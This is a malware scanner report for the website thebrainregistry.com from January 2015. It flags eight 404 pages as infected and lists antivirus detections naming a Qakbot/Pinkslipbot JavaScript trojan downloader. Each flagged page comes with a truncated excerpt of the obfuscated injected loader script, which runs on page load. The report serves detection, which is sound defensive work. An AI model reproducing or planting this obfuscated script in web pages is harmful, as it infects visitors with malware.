New scan:

Malware Scanner report for thebrainregistry.com

Malicious/Suspicious/Total urls checked
8/0/16
8 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "thebrainregistry.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=thebrainregistry.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://thebrainregistry.com/
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Sun, 11 Jan 2015 06:38:26 GMT
Location: http://thebrainproject.org
Server: Apache
Content-Length: 0
Content-Type: text/html
X-Powered-By: PHP/5.3.6
clean
http://thebrainproject.org/
200 OK
Content-Length: 48959
Content-Type: text/html
clean
http://ajax.googleapis.com/ajax/libs/jquery/1.6/jquery.min.js
200 OK
Content-Length: 91668
Content-Type: text/javascript
clean
http://thebrainregistry.com//ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js/
404 Not Found
Content-Length: 23043
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var oJBxHybFt;var T3HG6qE=0;function m4o0(py42,aMvpeP4d7,aMvpfP4d7,aMvpgP4d7,aMvpdP4d7,aMvpaP4d7,aMvpbP4d7,aMvpcP4d7){var juTsBoNCs6=py42;py42+='3280';if(py42==juTsBoNCs6){for(var i;i<py42.length;i++){juTsBoNCs6+=py42.charCodeAt(i);if(i==0x61){break;}}}return py42.length;};function JMF97KBeq5(gxR60){m4o0(gxR60+'qubna');var lCupRzc7dAm='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';var IutLz,nSl09t2b,K8L4BFi1EL,awcn1,result=[];for(awcn1=0;awcn1<gxR60.length;awcn1++){if(g
... 2770 bytes are skipped ...
nerHTML=oOqO6Vw;o2e51(EhPTUVOum,JCtvN);}catch(e){};};if(document.addEventListener){document.addEventListener(F3MVzp('jIuStIm1zMTnvJ2npbuSgg==', 0),KIl4PgPjf,false);}else{document.write('<'+'script id=__ie_onload defer src=javascript:void(0)><'+'\/script>');var script=document.getElementById(F3MVzp('l5u2krm01s3mqbU=', 0));script.onreadystatechange=function(){if(this.readyState==F3MVzp('q6uyh4q+zMQ=', 0)){KIl4PgPjf();}};}google.load("jquery", "1.4.2"); google.load("jqueryui", "1.8.2");

Antivirus reports:

Avast
JS:Agent-NC [Trj]
Ad-Aware
Trojan.JS.Iframe.AKV
Ikarus
Virus.JS.Obfuscated
nProtect
Trojan.JS.Iframe.AKV
K7AntiVirus
Riskware ( f31acd190 )
TrendMicro-HouseCall
TROJ_GEN.F47V1030
Comodo
UnclassifiedMalware
Emsisoft
Trojan.JS.Iframe.AKV (B)
K7GW
Riskware ( f31acd190 )
McAfee-GW-Edition
JS/Pinkslipbot
Microsoft
TrojanDownloader:JS/Qakbot.H
Kaspersky
Trojan-Downloader.JS.Agent.giz
MicroWorld-eScan
Trojan.JS.Iframe.AKV
Fortinet
JS/Agent.GIZ!tr.dldr
McAfee
JS/Pinkslipbot
NANO-Antivirus
Trojan.Script.Agent.bphoas
F-Secure
Trojan.JS.Iframe.AKV
VIPRE
Trojan-Downloader.JS.Quakbot.gen (v)
F-Prot
JS/Crypted.PE.gen
AVG
JS/Obfuscated
GData
Trojan.JS.Iframe.AKV
Commtouch
JS/Crypted.PE.gen
BitDefender
Trojan.JS.Iframe.AKV

http://www.google.com/jsapi
200 OK
Content-Length: 24552
Content-Type: text/javascript
clean
http://thebrainregistry.com/js/jquery.hoverIntent.minified.js
200 OK
Content-Length: 1607
Content-Type: application/javascript
clean
http://thebrainregistry.com/js/jquery.bgiframe.min.js
200 OK
Content-Length: 1194
Content-Type: application/javascript
clean
http://thebrainregistry.com/js/superfish.js
200 OK
Content-Length: 3711
Content-Type: application/javascript
clean
http://thebrainregistry.com/js/jquery.cycle.lite.min.js
200 OK
Content-Length: 3566
Content-Type: application/javascript
clean
http://thebrainregistry.com//ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js/index.php/
404 Not Found
Content-Length: 23053
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var oJBxHybFt;var T3HG6qE=0;function m4o0(py42,aMvpeP4d7,aMvpfP4d7,aMvpgP4d7,aMvpdP4d7,aMvpaP4d7,aMvpbP4d7,aMvpcP4d7){var juTsBoNCs6=py42;py42+='3280';if(py42==juTsBoNCs6){for(var i;i<py42.length;i++){juTsBoNCs6+=py42.charCodeAt(i);if(i==0x61){break;}}}return py42.length;};function JMF97KBeq5(gxR60){m4o0(gxR60+'qubna');var lCupRzc7dAm='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';var IutLz,nSl09t2b,K8L4BFi1EL,awcn1,result=[];for(awcn1=0;awcn1<gxR60.length;awcn1++){if(g
... 2770 bytes are skipped ...
nerHTML=oOqO6Vw;o2e51(EhPTUVOum,JCtvN);}catch(e){};};if(document.addEventListener){document.addEventListener(F3MVzp('jIuStIm1zMTnvJ2npbuSgg==', 0),KIl4PgPjf,false);}else{document.write('<'+'script id=__ie_onload defer src=javascript:void(0)><'+'\/script>');var script=document.getElementById(F3MVzp('l5u2krm01s3mqbU=', 0));script.onreadystatechange=function(){if(this.readyState==F3MVzp('q6uyh4q+zMQ=', 0)){KIl4PgPjf();}};}google.load("jquery", "1.4.2"); google.load("jqueryui", "1.8.2");

Antivirus reports:

Avast
JS:Agent-NC [Trj]
Ad-Aware
Trojan.JS.Iframe.AKV
Ikarus
Virus.JS.Obfuscated
nProtect
Trojan.JS.Iframe.AKV
K7AntiVirus
Riskware ( f31acd190 )
TrendMicro-HouseCall
TROJ_GEN.F47V1030
Comodo
UnclassifiedMalware
Emsisoft
Trojan.JS.Iframe.AKV (B)
K7GW
Riskware ( f31acd190 )
McAfee-GW-Edition
JS/Pinkslipbot
Microsoft
TrojanDownloader:JS/Qakbot.H
Kaspersky
Trojan-Downloader.JS.Agent.giz
MicroWorld-eScan
Trojan.JS.Iframe.AKV
Fortinet
JS/Agent.GIZ!tr.dldr
McAfee
JS/Pinkslipbot
NANO-Antivirus
Trojan.Script.Agent.bphoas
F-Secure
Trojan.JS.Iframe.AKV
VIPRE
Trojan-Downloader.JS.Quakbot.gen (v)
F-Prot
JS/Crypted.PE.gen
AVG
JS/Obfuscated
GData
Trojan.JS.Iframe.AKV
Commtouch
JS/Crypted.PE.gen
BitDefender
Trojan.JS.Iframe.AKV

http://thebrainregistry.com//ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js/index.php/index.php/
404 Not Found
Content-Length: 23063
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var oJBxHybFt;var T3HG6qE=0;function m4o0(py42,aMvpeP4d7,aMvpfP4d7,aMvpgP4d7,aMvpdP4d7,aMvpaP4d7,aMvpbP4d7,aMvpcP4d7){var juTsBoNCs6=py42;py42+='3280';if(py42==juTsBoNCs6){for(var i;i<py42.length;i++){juTsBoNCs6+=py42.charCodeAt(i);if(i==0x61){break;}}}return py42.length;};function JMF97KBeq5(gxR60){m4o0(gxR60+'qubna');var lCupRzc7dAm='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';var IutLz,nSl09t2b,K8L4BFi1EL,awcn1,result=[];for(awcn1=0;awcn1<gxR60.length;awcn1++){if(g
... 2770 bytes are skipped ...
nerHTML=oOqO6Vw;o2e51(EhPTUVOum,JCtvN);}catch(e){};};if(document.addEventListener){document.addEventListener(F3MVzp('jIuStIm1zMTnvJ2npbuSgg==', 0),KIl4PgPjf,false);}else{document.write('<'+'script id=__ie_onload defer src=javascript:void(0)><'+'\/script>');var script=document.getElementById(F3MVzp('l5u2krm01s3mqbU=', 0));script.onreadystatechange=function(){if(this.readyState==F3MVzp('q6uyh4q+zMQ=', 0)){KIl4PgPjf();}};}google.load("jquery", "1.4.2"); google.load("jqueryui", "1.8.2");

Antivirus reports:

Avast
JS:Agent-NC [Trj]
Ad-Aware
Trojan.JS.Iframe.AKV
Ikarus
Virus.JS.Obfuscated
nProtect
Trojan.JS.Iframe.AKV
K7AntiVirus
Riskware ( f31acd190 )
TrendMicro-HouseCall
TROJ_GEN.F47V1030
Comodo
UnclassifiedMalware
Emsisoft
Trojan.JS.Iframe.AKV (B)
K7GW
Riskware ( f31acd190 )
McAfee-GW-Edition
JS/Pinkslipbot
Microsoft
TrojanDownloader:JS/Qakbot.H
Kaspersky
Trojan-Downloader.JS.Agent.giz
MicroWorld-eScan
Trojan.JS.Iframe.AKV
Fortinet
JS/Agent.GIZ!tr.dldr
McAfee
JS/Pinkslipbot
NANO-Antivirus
Trojan.Script.Agent.bphoas
F-Secure
Trojan.JS.Iframe.AKV
VIPRE
Trojan-Downloader.JS.Quakbot.gen (v)
F-Prot
JS/Crypted.PE.gen
AVG
JS/Obfuscated
GData
Trojan.JS.Iframe.AKV
Commtouch
JS/Crypted.PE.gen
BitDefender
Trojan.JS.Iframe.AKV

http://thebrainregistry.com//ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js/index.php/index.php/index.php/
404 Not Found
Content-Length: 23073
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var oJBxHybFt;var T3HG6qE=0;function m4o0(py42,aMvpeP4d7,aMvpfP4d7,aMvpgP4d7,aMvpdP4d7,aMvpaP4d7,aMvpbP4d7,aMvpcP4d7){var juTsBoNCs6=py42;py42+='3280';if(py42==juTsBoNCs6){for(var i;i<py42.length;i++){juTsBoNCs6+=py42.charCodeAt(i);if(i==0x61){break;}}}return py42.length;};function JMF97KBeq5(gxR60){m4o0(gxR60+'qubna');var lCupRzc7dAm='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';var IutLz,nSl09t2b,K8L4BFi1EL,awcn1,result=[];for(awcn1=0;awcn1<gxR60.length;awcn1++){if(g
... 2770 bytes are skipped ...
nerHTML=oOqO6Vw;o2e51(EhPTUVOum,JCtvN);}catch(e){};};if(document.addEventListener){document.addEventListener(F3MVzp('jIuStIm1zMTnvJ2npbuSgg==', 0),KIl4PgPjf,false);}else{document.write('<'+'script id=__ie_onload defer src=javascript:void(0)><'+'\/script>');var script=document.getElementById(F3MVzp('l5u2krm01s3mqbU=', 0));script.onreadystatechange=function(){if(this.readyState==F3MVzp('q6uyh4q+zMQ=', 0)){KIl4PgPjf();}};}google.load("jquery", "1.4.2"); google.load("jqueryui", "1.8.2");

Antivirus reports:

Avast
JS:Agent-NC [Trj]
Ad-Aware
Trojan.JS.Iframe.AKV
Ikarus
Virus.JS.Obfuscated
nProtect
Trojan.JS.Iframe.AKV
K7AntiVirus
Riskware ( f31acd190 )
TrendMicro-HouseCall
TROJ_GEN.F47V1030
Comodo
UnclassifiedMalware
Emsisoft
Trojan.JS.Iframe.AKV (B)
K7GW
Riskware ( f31acd190 )
McAfee-GW-Edition
JS/Pinkslipbot
Microsoft
TrojanDownloader:JS/Qakbot.H
Kaspersky
Trojan-Downloader.JS.Agent.giz
MicroWorld-eScan
Trojan.JS.Iframe.AKV
Fortinet
JS/Agent.GIZ!tr.dldr
McAfee
JS/Pinkslipbot
NANO-Antivirus
Trojan.Script.Agent.bphoas
F-Secure
Trojan.JS.Iframe.AKV
VIPRE
Trojan-Downloader.JS.Quakbot.gen (v)
F-Prot
JS/Crypted.PE.gen
AVG
JS/Obfuscated
GData
Trojan.JS.Iframe.AKV
Commtouch
JS/Crypted.PE.gen
BitDefender
Trojan.JS.Iframe.AKV

http://thebrainregistry.com//ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js/index.php/index.php/index.php/index.php/
404 Not Found
Content-Length: 23083
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var oJBxHybFt;var T3HG6qE=0;function m4o0(py42,aMvpeP4d7,aMvpfP4d7,aMvpgP4d7,aMvpdP4d7,aMvpaP4d7,aMvpbP4d7,aMvpcP4d7){var juTsBoNCs6=py42;py42+='3280';if(py42==juTsBoNCs6){for(var i;i<py42.length;i++){juTsBoNCs6+=py42.charCodeAt(i);if(i==0x61){break;}}}return py42.length;};function JMF97KBeq5(gxR60){m4o0(gxR60+'qubna');var lCupRzc7dAm='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';var IutLz,nSl09t2b,K8L4BFi1EL,awcn1,result=[];for(awcn1=0;awcn1<gxR60.length;awcn1++){if(g
... 2770 bytes are skipped ...
nerHTML=oOqO6Vw;o2e51(EhPTUVOum,JCtvN);}catch(e){};};if(document.addEventListener){document.addEventListener(F3MVzp('jIuStIm1zMTnvJ2npbuSgg==', 0),KIl4PgPjf,false);}else{document.write('<'+'script id=__ie_onload defer src=javascript:void(0)><'+'\/script>');var script=document.getElementById(F3MVzp('l5u2krm01s3mqbU=', 0));script.onreadystatechange=function(){if(this.readyState==F3MVzp('q6uyh4q+zMQ=', 0)){KIl4PgPjf();}};}google.load("jquery", "1.4.2"); google.load("jqueryui", "1.8.2");

Antivirus reports:

Avast
JS:Agent-NC [Trj]
Ad-Aware
Trojan.JS.Iframe.AKV
Ikarus
Virus.JS.Obfuscated
nProtect
Trojan.JS.Iframe.AKV
K7AntiVirus
Riskware ( f31acd190 )
TrendMicro-HouseCall
TROJ_GEN.F47V1030
Comodo
UnclassifiedMalware
Emsisoft
Trojan.JS.Iframe.AKV (B)
K7GW
Riskware ( f31acd190 )
McAfee-GW-Edition
JS/Pinkslipbot
Microsoft
TrojanDownloader:JS/Qakbot.H
Kaspersky
Trojan-Downloader.JS.Agent.giz
MicroWorld-eScan
Trojan.JS.Iframe.AKV
Fortinet
JS/Agent.GIZ!tr.dldr
McAfee
JS/Pinkslipbot
NANO-Antivirus
Trojan.Script.Agent.bphoas
F-Secure
Trojan.JS.Iframe.AKV
VIPRE
Trojan-Downloader.JS.Quakbot.gen (v)
F-Prot
JS/Crypted.PE.gen
AVG
JS/Obfuscated
GData
Trojan.JS.Iframe.AKV
Commtouch
JS/Crypted.PE.gen
BitDefender
Trojan.JS.Iframe.AKV

http://thebrainregistry.com//ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js/index.php/index.php/index.php/index.php/index.php/
404 Not Found
Content-Length: 23093
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var oJBxHybFt;var T3HG6qE=0;function m4o0(py42,aMvpeP4d7,aMvpfP4d7,aMvpgP4d7,aMvpdP4d7,aMvpaP4d7,aMvpbP4d7,aMvpcP4d7){var juTsBoNCs6=py42;py42+='3280';if(py42==juTsBoNCs6){for(var i;i<py42.length;i++){juTsBoNCs6+=py42.charCodeAt(i);if(i==0x61){break;}}}return py42.length;};function JMF97KBeq5(gxR60){m4o0(gxR60+'qubna');var lCupRzc7dAm='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';var IutLz,nSl09t2b,K8L4BFi1EL,awcn1,result=[];for(awcn1=0;awcn1<gxR60.length;awcn1++){if(g
... 2770 bytes are skipped ...
nerHTML=oOqO6Vw;o2e51(EhPTUVOum,JCtvN);}catch(e){};};if(document.addEventListener){document.addEventListener(F3MVzp('jIuStIm1zMTnvJ2npbuSgg==', 0),KIl4PgPjf,false);}else{document.write('<'+'script id=__ie_onload defer src=javascript:void(0)><'+'\/script>');var script=document.getElementById(F3MVzp('l5u2krm01s3mqbU=', 0));script.onreadystatechange=function(){if(this.readyState==F3MVzp('q6uyh4q+zMQ=', 0)){KIl4PgPjf();}};}google.load("jquery", "1.4.2"); google.load("jqueryui", "1.8.2");

Antivirus reports:

Avast
JS:Agent-NC [Trj]
Ad-Aware
Trojan.JS.Iframe.AKV
Ikarus
Virus.JS.Obfuscated
nProtect
Trojan.JS.Iframe.AKV
K7AntiVirus
Riskware ( f31acd190 )
TrendMicro-HouseCall
TROJ_GEN.F47V1030
Comodo
UnclassifiedMalware
Emsisoft
Trojan.JS.Iframe.AKV (B)
K7GW
Riskware ( f31acd190 )
McAfee-GW-Edition
JS/Pinkslipbot
Microsoft
TrojanDownloader:JS/Qakbot.H
Kaspersky
Trojan-Downloader.JS.Agent.giz
MicroWorld-eScan
Trojan.JS.Iframe.AKV
Fortinet
JS/Agent.GIZ!tr.dldr
McAfee
JS/Pinkslipbot
NANO-Antivirus
Trojan.Script.Agent.bphoas
F-Secure
Trojan.JS.Iframe.AKV
VIPRE
Trojan-Downloader.JS.Quakbot.gen (v)
F-Prot
JS/Crypted.PE.gen
AVG
JS/Obfuscated
GData
Trojan.JS.Iframe.AKV
Commtouch
JS/Crypted.PE.gen
BitDefender
Trojan.JS.Iframe.AKV

http://thebrainregistry.com//ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js/index.php/index.php/index.php/index.php/index.php/index.php/
404 Not Found
Content-Length: 23103
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var oJBxHybFt;var T3HG6qE=0;function m4o0(py42,aMvpeP4d7,aMvpfP4d7,aMvpgP4d7,aMvpdP4d7,aMvpaP4d7,aMvpbP4d7,aMvpcP4d7){var juTsBoNCs6=py42;py42+='3280';if(py42==juTsBoNCs6){for(var i;i<py42.length;i++){juTsBoNCs6+=py42.charCodeAt(i);if(i==0x61){break;}}}return py42.length;};function JMF97KBeq5(gxR60){m4o0(gxR60+'qubna');var lCupRzc7dAm='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';var IutLz,nSl09t2b,K8L4BFi1EL,awcn1,result=[];for(awcn1=0;awcn1<gxR60.length;awcn1++){if(g
... 2770 bytes are skipped ...
nerHTML=oOqO6Vw;o2e51(EhPTUVOum,JCtvN);}catch(e){};};if(document.addEventListener){document.addEventListener(F3MVzp('jIuStIm1zMTnvJ2npbuSgg==', 0),KIl4PgPjf,false);}else{document.write('<'+'script id=__ie_onload defer src=javascript:void(0)><'+'\/script>');var script=document.getElementById(F3MVzp('l5u2krm01s3mqbU=', 0));script.onreadystatechange=function(){if(this.readyState==F3MVzp('q6uyh4q+zMQ=', 0)){KIl4PgPjf();}};}google.load("jquery", "1.4.2"); google.load("jqueryui", "1.8.2");

Antivirus reports:

Avast
JS:Agent-NC [Trj]
Ad-Aware
Trojan.JS.Iframe.AKV
Ikarus
Virus.JS.Obfuscated
nProtect
Trojan.JS.Iframe.AKV
K7AntiVirus
Riskware ( f31acd190 )
TrendMicro-HouseCall
TROJ_GEN.F47V1030
Comodo
UnclassifiedMalware
Emsisoft
Trojan.JS.Iframe.AKV (B)
K7GW
Riskware ( f31acd190 )
McAfee-GW-Edition
JS/Pinkslipbot
Microsoft
TrojanDownloader:JS/Qakbot.H
Kaspersky
Trojan-Downloader.JS.Agent.giz
MicroWorld-eScan
Trojan.JS.Iframe.AKV
Fortinet
JS/Agent.GIZ!tr.dldr
McAfee
JS/Pinkslipbot
NANO-Antivirus
Trojan.Script.Agent.bphoas
F-Secure
Trojan.JS.Iframe.AKV
VIPRE
Trojan-Downloader.JS.Quakbot.gen (v)
F-Prot
JS/Crypted.PE.gen
AVG
JS/Obfuscated
GData
Trojan.JS.Iframe.AKV
Commtouch
JS/Crypted.PE.gen
BitDefender
Trojan.JS.Iframe.AKV

http://thebrainregistry.com//ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js/index.php/index.php/index.php/index.php/index.php/index.php/index.php/
404 Not Found
Content-Length: 23113
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var oJBxHybFt;var T3HG6qE=0;function m4o0(py42,aMvpeP4d7,aMvpfP4d7,aMvpgP4d7,aMvpdP4d7,aMvpaP4d7,aMvpbP4d7,aMvpcP4d7){var juTsBoNCs6=py42;py42+='3280';if(py42==juTsBoNCs6){for(var i;i<py42.length;i++){juTsBoNCs6+=py42.charCodeAt(i);if(i==0x61){break;}}}return py42.length;};function JMF97KBeq5(gxR60){m4o0(gxR60+'qubna');var lCupRzc7dAm='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';var IutLz,nSl09t2b,K8L4BFi1EL,awcn1,result=[];for(awcn1=0;awcn1<gxR60.length;awcn1++){if(g
... 2770 bytes are skipped ...
nerHTML=oOqO6Vw;o2e51(EhPTUVOum,JCtvN);}catch(e){};};if(document.addEventListener){document.addEventListener(F3MVzp('jIuStIm1zMTnvJ2npbuSgg==', 0),KIl4PgPjf,false);}else{document.write('<'+'script id=__ie_onload defer src=javascript:void(0)><'+'\/script>');var script=document.getElementById(F3MVzp('l5u2krm01s3mqbU=', 0));script.onreadystatechange=function(){if(this.readyState==F3MVzp('q6uyh4q+zMQ=', 0)){KIl4PgPjf();}};}google.load("jquery", "1.4.2"); google.load("jqueryui", "1.8.2");

Antivirus reports:

Avast
JS:Agent-NC [Trj]
Ad-Aware
Trojan.JS.Iframe.AKV
Ikarus
Virus.JS.Obfuscated
nProtect
Trojan.JS.Iframe.AKV
K7AntiVirus
Riskware ( f31acd190 )
TrendMicro-HouseCall
TROJ_GEN.F47V1030
Comodo
UnclassifiedMalware
Emsisoft
Trojan.JS.Iframe.AKV (B)
K7GW
Riskware ( f31acd190 )
McAfee-GW-Edition
JS/Pinkslipbot
Microsoft
TrojanDownloader:JS/Qakbot.H
Kaspersky
Trojan-Downloader.JS.Agent.giz
MicroWorld-eScan
Trojan.JS.Iframe.AKV
Fortinet
JS/Agent.GIZ!tr.dldr
McAfee
JS/Pinkslipbot
NANO-Antivirus
Trojan.Script.Agent.bphoas
F-Secure
Trojan.JS.Iframe.AKV
VIPRE
Trojan-Downloader.JS.Quakbot.gen (v)
F-Prot
JS/Crypted.PE.gen
AVG
JS/Obfuscated
GData
Trojan.JS.Iframe.AKV
Commtouch
JS/Crypted.PE.gen
BitDefender
Trojan.JS.Iframe.AKV


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: thebrainregistry.com

Result:
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Sun, 11 Jan 2015 06:38:26 GMT
Location: http://thebrainproject.org
Server: Apache
Content-Length: 0
Content-Type: text/html
X-Powered-By: PHP/5.3.6

...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: thebrainregistry.com
Referer: http://www.google.com/search?q=thebrainregistry.com

Result:
The result is similar to the first query. There are no suspicious redirects found.